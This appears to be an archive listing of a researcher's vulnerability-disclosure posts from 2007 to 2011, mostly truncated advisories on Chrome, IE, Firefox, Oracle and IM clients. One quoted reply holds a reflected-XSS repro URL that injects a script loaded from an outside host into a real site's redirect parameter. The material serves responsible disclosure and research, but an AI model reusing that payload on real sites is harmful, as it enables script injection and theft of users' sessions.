CVE-2010-2404 | Persistent Cross Site Scripting Vulnerability in Oracle I-Recruitment - E-Business Suite

2011-07-15 Thread Aditya K Sood
/SNS_09_01_Evad_Xss_Filter_Msword.pdf Disclosure: The vulnerability was disclosed to Oracle in January 2009 and is patched in October 2010 CPU release. Credit: Aditya K Sood of SecNiche Security Contact: adi_ks [at] secniche.org Disclaimer The information in the advisory is believed to be accurate at the

CVE-2010-3200 : Microsoft Word 2003 MSO Null Pointer Dereference Vulnerability

2010-09-14 Thread Aditya K Sood
ill be patched or corrected. Regards Aditya K Sood

Re: Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)

2010-08-24 Thread Aditya K Sood
Hi Tim You can have a look at the screenshot at below mentioned link http://www.secniche.org/goog_chr_auth_spoof.jpg Kind Regards Aditya Tim wrote: > Aditya, > > >> First of all, the dialog spoofing issue still works in Google Chrome and >> it has not been patched. >> > > I'm not surp

Re: Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)

2010-08-24 Thread Aditya K Sood
Hi Tim First of all, the dialog spoofing issue still works in Google Chrome and it has not been patched. A lot of tests have been conducted considering different variants of spoofing. I missed your paper previously. I must say it's a very good read. A similar issue about Google URL obfuscation, which

Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)

2010-08-23 Thread Aditya K Sood
ced in the video itself) Kind Regards Aditya K Sood http://www.secniche.org

Google Chrome 3.0.195.38 | Chrome Frame - Reloading Memory Allocation based Tab Crashing

2010-01-08 Thread Aditya K Sood
: http://www.secniche.org/videos/goog_chrome_frame_mem_alloc_tab_crashing.html Blog Post: http://zeroknock.blogspot.com/2010/01/google-chrome-3019538-chrome-frame.html It can have diverse impact with more modularized codes in the future. All for community purposes. Kind Regards Aditya K Sood http

Re: [WEB SECURITY] Re: Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw

2010-01-06 Thread Aditya K Sood
Hi Berend-Jan Please find the respective responses > Repro steps: > 1) Some website do not sanitize user input correctly, such as the one > in your example, which allows things like XSS: > http://www.worksafenb.ca/redirect.asp?V=";'%20src=http://skypher.com/SkyLined/xss.js> http://www.worksafenb.c

Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw

2010-01-05 Thread Aditya K Sood
cting web application attacks. Post: http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html Video: http://www.secniche.org/videos/google_chrome_link_inj.html Browsers need to take care of these issues. Regards Aditya K Sood http://www.secniche.org

Advisory - Gmail/Google Doc PDF Repurposing Integrated Attacks - Cookie Hijacking / Stealing

2009-05-11 Thread Aditya K Sood
Hi Google docs network was vulnerable to PDF repurposing attacks. The vulnerability was disclosed to Google with discretion. This was done to mitigate the risk. Google had worked over it and patched it within a period of 5 days. The Google doc has been refined now and the integrated support f

[SecNiche WhitePaper ] - PDF Silent HTTP Form Repurposing Attacks

2009-05-04 Thread Aditya K Sood
Hi This paper sheds light on the modified approach to trigger web attacks through JavaScript protocol handler in the context of browser when a PDF is opened in it. As we have seen, the kind of security mechanism implemented by Adobe in order to remove the insecurities that originate directly from

In Response to Bid 34130 Invalid

2009-04-11 Thread Aditya K Sood
The observed behavior is explained at the below-mentioned link http://zeroknock.blogspot.com/2009/04/google-chrome-alert-single-thread-out.html This vulnerability persists in newer versions of Google Chrome too.

[SecNiche Whitepaper] Evading Web XSS Filters with Microsoft Word - WAPT Perspective

2009-04-01 Thread Aditya K Sood
generation of new attack vectors. You can download the paper at: http://www.secniche.org/paper.html http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf Regards Aditya K Sood Founder, SecNiche Security http://www.secniche.org

Microsoft Internet Explorer 8 - Anti Spoofing is a Myth

2009-04-01 Thread Aditya K Sood
. Browsers like Mozilla, Chrome etc. have well-designed and effective status/address bars. For the detailed issue: http://www.secniche.org/ie_spoof_myth/ Regards Aditya K Sood http://www.secniche.org

Advisory: Google Chrome 1.0.154.43 ClickJacking Vulnerability.

2009-01-28 Thread Aditya K Sood
tested are: Chrome/1.0.154.43 Disclosure Timeline: Disclosed: 27 January 2009 Release Date: 28 January 2009 Vendor Response: Google acknowledges this vulnerability and is already working on it. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time

Advisory: Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability

2009-01-19 Thread Aditya K Sood
l advisory update of 13 January 2009 Oracle Critical Patch Update: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Credit: Oracle Credited Aditya K Sood for discovering this vulnerability Disclaimer: The information in the advisory is believed to be accur

Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.

2009-01-05 Thread Aditya K Sood
severity level of this flaw. The Chrome ID of this issue is 5978. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition

Updated: Google Chrome 0.4.154.25 URI Meta Character URL Obfuscation

2008-11-26 Thread Aditya K Sood
Hi All The new Google Chrome version 0.4.154.25 also suffers from this vulnerability. The full PoC has been released at milw0rm. Have a look at it: http://milw0rm.com/exploits/7226 The problem is that most web servers have antivirus software which treats it as a URL spoofing virus. Anyways the

Google Chrome MetaCharacter URI Obfuscation Vulnerability

2008-11-24 Thread Aditya K Sood
Chrome/0.2.149.29 Disclosure Timeline: Disclosed: 24 November 2008 Release Date: 24 November 2008 Vendor Response: Reported to Google. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use

Google Chrome OnbeforeUload and OnUnload Null Check Vulnerability.

2008-10-21 Thread Aditya K Sood
ility affects Google Chrome on Microsoft Windows XP SP2 platform. The versions tested are: Chrome/0.2.149.30 Chrome/0.2.149.29 Disclosure Timeline: Disclosed: 19 October 2008 Release Date: 21 October 2008 Vendor Response: Google acknowledges this vulnerability and "fix" will be release

Advisory: Google Chrome Window Object Suppressing Remote Denial of Service.

2008-09-29 Thread Aditya K Sood
:* Disclosed: 25 September 2008 Release Date: 27 September 2008 *Vendor Response:* Google acknowledges this vulnerability as a security bug and "fix" will be released soon. *Credit:* Aditya K Sood *10. Disclaimer* The information in the advisory is believed to be accurate at the time of publis

Advisory : Opera Window Object Suppressing Remote Denial of Service

2008-09-29 Thread Aditya K Sood
this vulnerability affects Opera on Microsoft Windows XP SP2 platform. The versions tested are: Opera 9.52 *Disclosure Timeline:* Disclosed: 28 September 2008 Release Date: 28 September 2008 *Vendor Response:* Vulnerability reported to Opera. Bug ID 365663 *Credit:* Aditya K Sood *Disclaimer

Advisory: Mozilla Firefox User Interface Null Pointer Dereference Dispatcher Crash and Remote Denial of Service.

2008-09-29 Thread Aditya K Sood
x on Microsoft Windows XP SP2 platform. The versions tested are: Mozilla 3.0.3 - 1.9.0 Branch *Disclosure Timeline:* Disclosed: 28 September 2008 Release Date: 28 September 2008 *Vendor Response:* Mozilla confirms this vulnerability. *Credit:* Aditya K Sood *Disclaimer* The information in

Advisory : Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.

2008-09-24 Thread Aditya K Sood
t;fix" will be released soon. *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no represe

Re: Pidgin IM Client Password Disclosure Vulnerability.

2008-09-18 Thread Aditya K Sood
al Message----- From: Aditya K Sood [mailto:[EMAIL PROTECTED] Sent: Wednesday, 17 September 2008 10:41 PM To: bugtraq@securityfocus.com Subject: Pidgin IM Client Password Disclosure Vulnerability. Pidgin IM Client Password Disclosure Vulnerability. *Version Affected:* 0.7.10 Unicode / Previous vers

Hi Two Points to consider

2008-09-18 Thread Aditya K Sood
Hi Bugtraq Two points I want to make. 1. The version number in the Pidgin advisory should be 2.5.1 2. In the Skype explanation, the Skype process should be there instead of the Pidgin process. I have corrected this on the reference sites. Just want to let you know. If any issues please let me know. Regards

Microsoft Internet Explorer DoS in Rendering Malicious PNG Files.

2008-09-17 Thread Aditya K Sood
vulnerability and "fix" will be released in the final version of Internet Explorer 8 later this year. *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the i

Pidgin IM Client Password Disclosure Vulnerability.

2008-09-17 Thread Aditya K Sood
cniche.org/advisory.html http://evilfingers.com/advisory/index.php * Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS

Miranda IM Client Password Disclosure Vulnerability.

2008-09-17 Thread Aditya K Sood
cept: http://evilfingers.com/advisory/miranda_im_mem_pass_disc.pdf http://secniche/advisory/miranda_vul.pdf *Links:* http://secniche.org/advisory.html http://evilfingers.com/advisory/index.php *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of

Skype IM Client Password Disclosure Vulnerability.

2008-09-17 Thread Aditya K Sood
t: http://evilfingers.com/advisory/skype_pass_dis_vul.pdf http://secniche.org/advisory/skype_vul.pdf Links: http://secniche.org/advisory.html http://evilfingers.com/advisory/index.php *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of

[Mlabs] Dissecting Internals of Windows XP Svchost : Reverse Engineering Stature

2007-09-21 Thread Aditya K Sood
Hi all This is the reverse engineering layout of Svchost internals. Category: Reverse Engineering Analysis. The paper solely relates to the core internals that build up the Windows XP Svchost. The Svchost internals have not been disseminated into informative elements yet. I have found only on

Re: 0day: PDF pwns Windows

2007-09-20 Thread Aditya K Sood
pdp (architect) wrote: http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF

[Mlabs] Scrutinising SIP Payloads : Traversing Attack Vectors in VOIP and IM

2007-09-20 Thread Aditya K Sood
Hi I have released a core research paper on SIP comprising payload problems and attack vectors. This research paper lays stress on the potential weaknesses present in SIP which make it vulnerable to stringent attacks. The point of discussion is to understand the weak spots in the protocol.

[Paper] The Anatomy of Third Party Pop Up Attacks.

2007-09-01 Thread Aditya K Sood
Hi This article deals with the latest third party popup attacks that are performed by an attacker from the rogue and vulnerable links of the web sites to circumvent the normal functioning on the web. The target website always seems to be the liable web provider from where the popup attacks are

Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

2007-08-15 Thread Aditya K Sood
rity sites like secunia or idefence. This would certainly save you from public embarrassment. -d -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Aditya K Sood Sent: 17 August 2007 09:07 To: [EMAIL PROTECTED]; bugtraq@securityfocus.com; [EMAIL PROTECTE

SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

2007-08-15 Thread Aditya K Sood
Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability Dated : 15 August 2007 Severity : Critical Explanation : The vulnerability persists in the popup blocker functioning to allow specific websites to execute popup in the running instance of Internet Explorer.

[Whitepaper SecNiche] Insecurities in Implementing Serialization in BISON

2007-08-02 Thread Aditya K Sood
hi A specific white paper has been released comprising specific application problems related to Bison. You can look into it. http://www.secniche.org/papers/Ser_Insec_Bison.pdf Regards AKS http://www.secniche.org

[CVE-2007-3816][Advisory] JWIG Context-Dependent Template Calling Dos

2007-07-19 Thread Aditya K Sood
external templates. For more details : http://www.secniche.org/papers/HackAnnotationsInJWIG.pdf Links: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3816 http://nvd.nist.gov/cpe.cfm?cvename=CVE-2007-3816 Regards Aditya K Sood SecNiche Security

WhitePapers By SecNiche Security

2007-07-14 Thread Aditya K Sood
Hi all The whitepapers regarding Java Web Security Technologies have been released. 1. JNLP Security Convergence : http://www.secniche.org/papers/JNLP_Security_Con.pdf 2. Hack Annotations in JWIG : http://www.secniche.org/papers/HackAnnotationsInJWIG.pdf Regards Aditya K

Advisory : Internet Explorer Zone Domain Specification Dos and Page suppressing.

2007-07-02 Thread Aditya K Sood
. Avoid visiting untrusted Websites. 2. Script Restriction should be applied. - Aditya K Sood http://www.secniche.org

SECNICHE : Dwelling Security is On the Run

2007-06-11 Thread Aditya K Sood
. Aditya K Sood aka Zeroknock http://www.secniche.org

MLabs is Shifted Fully : SecNiche Initiative

2007-06-11 Thread Aditya K Sood
Hi all The Mlabs have been fully shifted to secniche domain. You can check it: http://mlabs.secniche.org Regards Aditya K Sood aka Zeroknock http://www.secniche.org

Project CERA Is Up Again : Secniche Initiative

2007-06-11 Thread Aditya K Sood
Hi all The project CERA is up again. CERA : Cutting Edge Research Arena. You can look into it. http://cera.secniche.org Regards Aditya K Sood aka Zeroknock http://www.secniche.org